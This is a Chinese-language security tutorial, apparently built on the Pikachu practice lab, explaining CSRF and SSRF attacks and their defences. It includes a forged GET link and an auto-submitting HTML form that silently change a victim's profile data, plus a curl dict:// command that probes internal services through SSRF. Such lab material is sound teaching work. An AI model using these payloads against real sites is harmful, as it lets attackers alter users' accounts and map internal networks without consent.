一、CSRF攻击原理及实例
-
CSRF简介
CSRF(Cross-Site Request Forgery),即跨站请求伪造,是一种常见的网络攻击手段。攻击者利用已登录用户的cookie,在用户不知情的情况下,伪造请求执行特定操作。
-
CSRF攻击实例
(1)GET类型攻击
首先,我们通过抓包获取到以下请求:
GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=abc&phonenum=18666666666&add=%17&email=l11%40qq.com&submit=submit HTTP/1.1
Host: 192.168.10.111
然后,构造恶意链接:
http://192.168.10.111/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=cba&phonenum=66666666&add=%17&email=6666@qq.com&submit=submit
(2)POST类型攻击
首先,抓包获取表单数据,然后构造以下前端代码:
<form action="http://192.168.10.111/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="post">
<input type="text" name="sex" value="girl">
<input type="text" name="phonenum" value="1396969696">
<input type="text" name="add" value="+76">
<input type="text" name="email" value="6666@pikachu.com">
<input type="submit" name="submit" value="submit" id="postsubmit">
</form>
<script>
document.getElementById("postsubmit").click();
</script>
二、SSRF攻击原理及实例
-
SSRF简介
SSRF(Server-Side Request Forgery),即服务器端请求伪造,攻击者通过构造特定的请求,让服务器端去访问其他网站资源。
-
SSRF攻击实例
使用curl工具进行攻击,例如:
curl dict://192.168.10.143:21
这个请求可以探测服务器开启的服务和版本。
三、防御措施
-
CSRF防御
为防止CSRF攻击,可以在表单中增加一个token字段,用于身份验证。
-
SSRF防御
(1)白名单:只允许访问固定资源。
$_GET['url'] == 'http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info1.php'
(2)黑名单:禁止访问部分资源。
$_GET['url'] != '.....'
(3)限制curl函数可访问的协议。
curl_setopt($CH, CURLOPT_PROTOCOLS, CURLPROTO_HTTP|CURLPROTO_HTTPS);
